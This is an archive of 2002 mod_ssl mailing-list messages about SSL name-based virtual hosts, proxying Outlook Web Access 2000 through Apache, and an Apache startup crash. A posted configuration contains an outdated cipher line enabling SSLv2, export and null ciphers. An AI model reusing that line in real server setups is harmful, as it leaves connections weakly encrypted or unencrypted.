X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: 2 ssl virtualhosts whith 1 IP
Date: Thu, 7 Nov 2002 10:51:06 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A4CC@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: 2 ssl virtualhosts whith 1 IP
Thread-Index: AcKGQBnF5BH5nEuOSROQNpZPRgQvMgAAk0YQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You can't get around the problem with rewrite rules. The essential
problem is that HTTPS encapsulates HTTP. What this means is that when
apache gets an HTTPS request, it has to route it to a virtual host using
*only* its TCP/IP attributes (IP addr and port no). It cannot use any
HTTP attributes (e.g. Host header) since these are encrypted and apache
cannot decrypt the request until it finds a certificate, but the cert is
defined in the VH!

This is the commonest question on mod_ssl - search the archives for
"name-based virtual hosts" for an ad nauseum discussion...

Rgds,

Owen Boyle

>-----Original Message-----
>From: fred [mailto:fred@skyturn.net]
>Sent: Donnerstag, 7. November 2002 10:25
>To: modssl-users@modssl.org
>Subject: Re: 2 ssl virtualhosts whith 1 IP
>
>
>Thank you.
>Is it possible to use Rewrite to redirect request from:
>https://domaine1.com/something/page.ext?var1=val1&var2=val2
>to
>https://domaine1.com:444/something/page.ext?var1=val1&var2=val2
>
>I have try :
>RewriteEngine On
>RewriteCond %{SERVER_PORT}      ^443$
>RewriteCond %{SERVER_NAME}      ^https://domaine1.com$
>RewriteRule ^/$                 https://domaine1.com:444 [L,R]
>
>But it doesn't work.
>Thank you very mutch for your support.
>
>
>On Thursday 7 November 2002 10:07, you wrote:
>> > Is it possible to have 2 ssl.crt with 2 virtualhosts with 
>only one IP ?
>>
>> Only if u use different ports......
>>
>> greetings,
>> josef
>>
>> > Thanks for your support.
>> > 
>______________________________________________________________________
>> > Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> > User Support Mailing List
modssl-users@modssl.org
> > Automated List Manager
majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 15:59:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA13789; Thu, 7 Nov 2002 15:59:03 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.esilicon.com id PAA13771; Thu, 7 Nov 2002 15:57:44 +0100 (MET)
Received: from mail00.sc.esilicon.com ([10.1.5.36]) by smtp.esilicon.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 7 Nov 2002 06:57:37 -0800
content-class: urn:content-classes:message
Subject: RE: Is anyone successfully running OWA2K behind Apache/mod_ssl?
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Thu, 7 Nov 2002 06:57:36 -0800
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Message-ID: <42B8E37890B1E64CB427CE1F260181EAE335@mail00.sc.esilicon.com>
Thread-Topic: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?
Thread-Index: AcKGNHrtiI5w+zfZRkm33S0YOQlBdAANYhJQ
From: "David Marshall" 
To: 
X-OriginalArrivalTime: 07 Nov 2002 14:57:37.0282 (UTC) FILETIME=[02E40E20:01C2866E]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA13772
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Marshall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jason,

I had this running on RedHat 7.2. Apache 1.3.22/Mod_SSL

Here are the steps...
1. Obtain Apache Mod mod_proxy_add_forward.c
   Modify the code to set the header "font-end-https: on".

   add the following

   /* turn on front-end-https header, so OWA will put HTTPS into urls */ 
   ap_table_set(r->headers_in, "front-end-https","on");

   Compile and install mod_proxy_add_forward.c. 
   I used command "apxs -i -c mod_proxy_add_forward.c" 
  
2. Add a line to your httpd.conf file: 
   "LoadModule proxy_add_forward_module /usr/lib/apache/1.3/mod_proxy_add_forward.so" 
    replacing /usr/lib/apache/1.3 with the path that apxs installs the module.

3. Add the following directives to the virtual host section of your apache
   configuration files, replacing FQDN with the fully qualified domain name you
   want to use, NOT the address of the exchange server:
    ProxyPass /exchange/ http://FQDN/exchange/
    ProxyPass /public/ http://FQDN/public/
    ProxyPass /exchweb/ http://FQDN/exchweb/

4. Make sure that external dns resolves the FQDN to the Apache proxy server

5. Modify your /etc/hosts on the Apache proxy server
   Add the FQDN to resolve to the ip address of the OWA server 

6. On the Server where OWA is installed, Turn off Windows Integrated Authentication
   run Internet Services Manager 
   ( "Programs"->"Administrative Tools"->"Internet Services Manager" )

   Expand to your OWA website and Right-click the OWA site and select 
   "Properties", on the resulting Dialog, select the "Directory Security" 
   Tab, Then Edit the "Anonymous access and authentication control", 
   remove "Windows Integrated Authentication" and turn on "Basic Authentication"

   note: you must repeat this step every time you restart IIS or reboot this machine.

I must tell that although the solution "worked", we did not put this solution into production. 

The biggest drawbacks to this solution were.
a. Every time you reboot/restart IIS on the System where OWA is installed, 
   your security settings will be reset adding "Windows Integrated Authentication" 
   back to the virtual directories. 

   We have found no way to resolve this.

b. We had to add a virtual host for every OWA site on Apache that we needed to host.
   In my environment we have 3 exchange servers and 2 routing groups. 
   This meant that as we changed our Exchange Topology, that we would have
   to re-work the Apache front-end proxy.

c. Users cannot use the password change option.

After reading the Microsoft Exchange Front-End/Backend documents http://www.microsoft.com/downloads/release.asp?releaseid=43997 , We decided to evaluate running a Front-End OWA server under SSL with HTTP disabled on a separate system from the other Exchange Servers. In the final analysis, we decided that this was the right answer for us.

David Marshall


-----Original Message-----
From: Jason Haar [mailto:Jason.Haar@trimble.co.nz]
Sent: Thursday, November 07, 2002 12:04 AM
To: modssl-users@modssl.org
Subject: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?


We're using Apache/mod_ssl to provide a reverse-proxy to some backend Web
servers, and want to add OWA2K to the list (that's Outlook Web Access for
Microsoft Exchange 2000).

It works fine with OWA from Exchange 5.5 - which was basically just HTML
plus some javascript - but OWA2K (under IE5+) uses all sorts of whizzy M$
stuff, and doesn't work!

If you access OWA2K with a non-IE browser (e.g. Mozilla), OWA2K reverts to
the older format and works fine - it just doesn't work well from IE (ironic
isn't it :-)

It's pretty flakey. IE5.0 works pretty well, IE5.5 works 20% of the time and
IE6 just dies. It goes without saying that all these browsers work fine when
talking directly to the OWA2K server: it's only via the RP that they fail.

I've done packet sniffs and compares and can't see anything out of the
ordinary. I think it's an OWA issue, or an IE security-context issue, but
can't say for sure.

Anyone else got any stories about this?

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 17:56:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17136; Thu, 7 Nov 2002 17:55:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from damngeek.com id RAA17130; Thu, 7 Nov 2002 17:54:32 +0100 (MET)
Received: from localhost (alex@localhost)
	by damngeek.com (8.9.3/8.9.3) with ESMTP id LAA13695
	for ; Thu, 7 Nov 2002 11:55:24 -0500
Date: Thu, 7 Nov 2002 11:55:23 -0500 (EST)
From: Alex 
To: 
Subject: ModSSL and VirtualHosts
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think I'm missing a few key points here, so I'm not able to find the
answers by myself. Hate to sound like a newbie, but I'm getting a little
frustrated.

Lets say I have this:


DocumentRoot /usr/local/www/domain1
ServerName domain1.dom



DocumentRoot /usr/local/www/wwwdomain1
ServerName www.domain1.dom



This works just great, both sites would show up and show the correct
directory. I can use the * or the ip address for the VirtualHost, both
with the same results.

All I can get with the https://... is the default directory saying apache
is installed. Now I can change the default directory in the VirtualHost
for _default_:443 and it will point to which ever directory I want, with
ssl.

How do I get https://domain1.dom the same as http://domain1.dom, and
https://www.domain1.dom the same as http://www.domain1.dom?

Or is it by design only to work with one directory?


Oh, and to possibly add to any confusion, this is a freebsd 4.7 box with
a private ip (firewalled) with apache+mod_ssl-1.3.27+2.8.12.

Any help would be appreciated.

Thanks for your time.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 18:18:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA18068; Thu, 7 Nov 2002 18:17:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id SAA18053; Thu, 7 Nov 2002 18:16:35 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA7HGYt9009107
	for ; Thu, 7 Nov 2002 18:16:34 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA7HGYEm001007
	for ; Thu, 7 Nov 2002 18:16:34 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ModSSL and VirtualHosts
Date: Thu, 7 Nov 2002 18:16:33 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A4D9@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: ModSSL and VirtualHosts
Thread-Index: AcKGfr6RXvI6+R+GTK6pdRRkjnNZSwAAprvQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

PLease type "SSL name-based virtual hosts" into Google and read some of
the replies - I can't bear to explain this one again...

>-----Original Message-----
>From: Alex [mailto:alex@damngeek.com]
>Sent: Donnerstag, 7. November 2002 17:55
>To: modssl-users@modssl.org
>Subject: ModSSL and VirtualHosts
>
>
>I think I'm missing a few key points here, so I'm not able to find the
>answers by myself. Hate to sound like a newbie, but I'm 
>getting a little
>frustrated.
>
>Lets say I have this:
>
>
>DocumentRoot /usr/local/www/domain1
>ServerName domain1.dom
>
>
>
>DocumentRoot /usr/local/www/wwwdomain1
>ServerName www.domain1.dom
>
>
>
>This works just great, both sites would show up and show the correct
>directory. I can use the * or the ip address for the VirtualHost, both
>with the same results.
>
>All I can get with the https://... is the default directory 
>saying apache
>is installed. Now I can change the default directory in the VirtualHost
>for _default_:443 and it will point to which ever directory I 
>want, with
>ssl.
>
>How do I get https://domain1.dom the same as http://domain1.dom, and
>https://www.domain1.dom the same as http://www.domain1.dom?
>
>Or is it by design only to work with one directory?
>
>
>Oh, and to possibly add to any confusion, this is a freebsd 
>4.7 box with
>a private ip (firewalled) with apache+mod_ssl-1.3.27+2.8.12.
>
>Any help would be appreciated.
>
>Thanks for your time.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 18:23:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA18216; Thu, 7 Nov 2002 18:22:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id SAA18209; Thu, 7 Nov 2002 18:21:15 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA7HLEt9009732
	for ; Thu, 7 Nov 2002 18:21:14 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA7HLDOP029172
	for ; Thu, 7 Nov 2002 18:21:14 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ModSSL and VirtualHosts
Date: Thu, 7 Nov 2002 18:21:13 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6E7@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: ModSSL and VirtualHosts
Thread-Index: AcKGfr6RXvI6+R+GTK6pdRRkjnNZSwAAsNfA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry. That last post was harsh - it's been a long day. But everyone
(including me) who moves into SSL immediately wonders why name-based VHs
don't work. You are the second person *today* to ask this...

The problem is that the packet is encrypted so apache can't see the Host
header so doesn't know what VH to use. But it needs the VH in  order to
decide on the cert - it's a classic Catch-22. There is no workaround (we
had a guy today trying rewrite rules - marks for originality, but no
cigar). You have to use separate IPs or ports...

Rgds,

Owen Boyle


>-----Original Message-----
>From: Alex [mailto:alex@damngeek.com]
>Sent: Donnerstag, 7. November 2002 17:55
>To: modssl-users@modssl.org
>Subject: ModSSL and VirtualHosts
>
>
>I think I'm missing a few key points here, so I'm not able to find the
>answers by myself. Hate to sound like a newbie, but I'm 
>getting a little
>frustrated.
>
>Lets say I have this:
>
>
>DocumentRoot /usr/local/www/domain1
>ServerName domain1.dom
>
>
>
>DocumentRoot /usr/local/www/wwwdomain1
>ServerName www.domain1.dom
>
>
>
>This works just great, both sites would show up and show the correct
>directory. I can use the * or the ip address for the VirtualHost, both
>with the same results.
>
>All I can get with the https://... is the default directory 
>saying apache
>is installed. Now I can change the default directory in the VirtualHost
>for _default_:443 and it will point to which ever directory I 
>want, with
>ssl.
>
>How do I get https://domain1.dom the same as http://domain1.dom, and
>https://www.domain1.dom the same as http://www.domain1.dom?
>
>Or is it by design only to work with one directory?
>
>
>Oh, and to possibly add to any confusion, this is a freebsd 
>4.7 box with
>a private ip (firewalled) with apache+mod_ssl-1.3.27+2.8.12.
>
>Any help would be appreciated.
>
>Thanks for your time.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 18:57:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA19557; Thu, 7 Nov 2002 18:56:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from fred.fred.com id SAA19549; Thu, 7 Nov 2002 18:55:30 +0100 (MET)
Message-Id: <200211071755.SAA19549@opensource.ee.ethz.ch>
Received: (qmail 8248 invoked from network); 7 Nov 2002 17:54:03 -0000
Received: from fred.com (HELO there) (192.168.0.125)
  by 0 with SMTP; 7 Nov 2002 17:54:03 -0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: fred 
To: modssl-users@modssl.org
Subject: Re: ModSSL and VirtualHosts
Date: Thu, 7 Nov 2002 18:54:03 +0100
X-Mailer: KMail [version 1.3.1]
References: <484A6CA492BE654395D208B1D8D5393972F6E7@SOMEXEVS001.ex.ordersx.org>
In-Reply-To: <484A6CA492BE654395D208B1D8D5393972F6E7@SOMEXEVS001.ex.ordersx.org>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fred 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello, I was the first one (of today)
I anderstand your ###!!!???. Its ###:::/??? to repeat ten times the same 
thing. I hope that my answer will help people to configure multi ssl with one 
IP.
Personaly I can not have an other IP so I use the same ip whith different 
port and I use mod Rewrite to redirect to the new port and it work very well.
ex:

Listen *:80
Listen *:443
Listen *:444


NameVirtualHost MY_IP:443


  DocumentRoot "/home/web/SSL/dmaine1/htdocs"
  ServerName domaine1
  ServerAdmin root@localhost
  SSLEngine on
  SSLCipherSuite                 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine1.crt
  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine1.key
  
    SSLOptions +StdEnvVars
  
  
    SSLOptions +StdEnvVars
  
  SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
  CustomLog /usr/local/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


  DocumentRoot "/home/web/SSL/domaine2/htdocs"
  ServerName domaine2
  ServerAdmin root@localhost
  RewriteEngine On
  RewriteRule ^/(.*)$ https://domaine2:444/$1 [R]
  SSLEngine on
  SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine2.crt
  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine2.key
  
    SSLOptions +StdEnvVars
  
  
    SSLOptions +StdEnvVars
  
  SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
  CustomLog /usr/local/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



  DocumentRoot "/home/web/SSL/domaine2/htdocs"
  ServerName domaine2
  ServerAdmin root@localhost
  SSLEngine on
  SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine2.crt
  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine2.key
  
    SSLOptions +StdEnvVars
  
  
    SSLOptions +StdEnvVars
  
  SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
  CustomLog /usr/local/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




On Thursday 7 November 2002 18:21, you wrote:
> Sorry. That last post was harsh - it's been a long day. But everyone
> (including me) who moves into SSL immediately wonders why name-based VHs
> don't work. You are the second person *today* to ask this...
>
> The problem is that the packet is encrypted so apache can't see the Host
> header so doesn't know what VH to use. But it needs the VH in  order to
> decide on the cert - it's a classic Catch-22. There is no workaround (we
> had a guy today trying rewrite rules - marks for originality, but no
> cigar). You have to use separate IPs or ports...
>
> Rgds,
>
> Owen Boyle
>
> >-----Original Message-----
>
> From: Alex [mailto:alex@damngeek.com]
>
> >Sent: Donnerstag, 7. November 2002 17:55
> >To: modssl-users@modssl.org
> >Subject: ModSSL and VirtualHosts
> >
> >
> >I think I'm missing a few key points here, so I'm not able to find the
> >answers by myself. Hate to sound like a newbie, but I'm
> >getting a little
> >frustrated.
> >
> >Lets say I have this:
> >
> >
> >DocumentRoot /usr/local/www/domain1
> >ServerName domain1.dom
> >
> >
> >
> >DocumentRoot /usr/local/www/wwwdomain1
> >ServerName www.domain1.dom
> >
> >
> >
> >This works just great, both sites would show up and show the correct
> >directory. I can use the * or the ip address for the VirtualHost, both
> >with the same results.
> >
> >All I can get with the https://... is the default directory
> >saying apache
> >is installed. Now I can change the default directory in the VirtualHost
> >for _default_:443 and it will point to which ever directory I
> >want, with
> >ssl.
> >
> >How do I get https://domain1.dom the same as http://domain1.dom, and
> >https://www.domain1.dom the same as http://www.domain1.dom?
> >
> >Or is it by design only to work with one directory?
> >
> >
> >Oh, and to possibly add to any confusion, this is a freebsd
> >4.7 box with
> >a private ip (firewalled) with apache+mod_ssl-1.3.27+2.8.12.
> >
> >Any help would be appreciated.
> >
> >Thanks for your time.
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 19:58:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21319; Thu, 7 Nov 2002 19:57:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA21308; Thu, 7 Nov 2002 19:56:47 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BA0B64CE6E2; Thu,  7 Nov 2002 19:56:49 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9233828680; Thu,  7 Nov 2002 19:52:31 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp01ffm.de.uu.net id KAA01617; Thu, 7 Nov 2002 10:06:24 +0100 (MET)
Received: from Iapetos.csfps.de (Iapetos.csfps.de [192.54.46.103])
	by smtp01ffm.de.uu.net (8.9.3/5.5.5) with ESMTP id KAA04656
	for ; Thu, 7 Nov 2002 10:06:23 +0100 (MET)
Received: from mailhost.teknon.de by Iapetos.csfps.de for modssl-users@modssl.org with ESMTP id gA796JQ11063; Thu, 7 Nov 2002 10:06:19 +0100 (MET)
Message-Id: <200211070906.gA796JQ11063@Iapetos.csfps.de>
Organization: Credit Suisse Financial Planning Solutions GmbH, D-55130 Mainz
To: modssl-users@modssl.org
Subject: Re: Is anyone successfully runnin OWA2K behind Apache/mod_ssl? 
In-reply-to: Your message of Thu, 07 Nov 2002 21:03:35 +1300
X-Mailer: MH 6.8
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Date: Thu, 07 Nov 2002 10:06:06 +0100
From: Volker Borchert 
X-Scanned: Iapetos
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Volker Borchert 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In message <20021107080335.GB26837@trimble.co.nz> you write:

|> We're using Apache/mod_ssl to provide a reverse-proxy to some backend Web
|> servers, and want to add OWA2K to the list (that's Outlook Web Access for
|> Microsoft Exchange 2000).

|> Anyone else got any stories about this?

Two things:

1) For me, it seems to work with IE only if I explicitly disallow any
   authentication scheme but Basic. IE defaults to NTLM which doesn't
   seem to work across Apache reverse.

2) OWA inserts a " HTML
   tag which means that you may have to play dirty tricks with DNS
   and/or nsswitch.conf to get it to work from the outside.

	vb
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 19:58:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21328; Thu, 7 Nov 2002 19:57:17 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA21310; Thu, 7 Nov 2002 19:56:47 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D34AA4CE74C; Thu,  7 Nov 2002 19:56:49 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 448E02873B; Thu,  7 Nov 2002 19:52:36 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailgate5.cinetic.de id KAA02422; Thu, 7 Nov 2002 10:19:15 +0100 (MET)
Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46])
	by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id gA79J9X02909;
	Thu, 7 Nov 2002 10:19:09 +0100
Date: Thu, 7 Nov 2002 10:19:09 +0100
Message-Id: <200211070919.gA79J9X02909@mailgate5.cinetic.de>
MIME-Version: 1.0
Organization: http://freemail.web.de/
From: Oliver Koeller 
To: modssl-users@modssl.org
Cc: "Snyder, Jeff M" 
Subject: Re: apachectl startssl - error
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Oliver Koeller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Jeff,

i added my former mail at the bottom.
Yes, I solved the problem but forgot to write it here, sorry.
The solution was to replace '_default_' with the full qualified domainname of my server in the VirtualHost definition:


Bye,
Olli.

"Snyder, Jeff M"  schrieb am 06.11.02 23:14:39:
> Oliver,
> 
> I am having the same problem, although I don't think it has anything to do
> with SSL.  I can get apache to run fine, but when I add a VirtualHost to the
> httpd.conf, that is when encounter the core dump.  Have you made any
> progress on this error?
> 
> -Jeff
> 

Hi,

i am a newbie to apache with ssl.
Under Solaris 8 I installed openssl 0.9.6g in /usr/local/openssl
In Apache 2.0.43 i did:
configure --enable-ssl --with-ssl=/usr/local/openssl
--> No errors.

make
--> No errors.

make install
--> No errors.

I generated a .cert and .key file and copied them to /usr/local/openssl/certs and /usr/local/openssl/private.

Then I tried to start it with:
apachectl startssl

and I get the following message:

[Wed Oct 30 19:31:59 2002] [crit] [Wed Oct 30 19:31:59 2002] \
file vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped

No error logs were created.

Any ideas??
Please help.
Thank you.
Bye,
Olli.

________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13

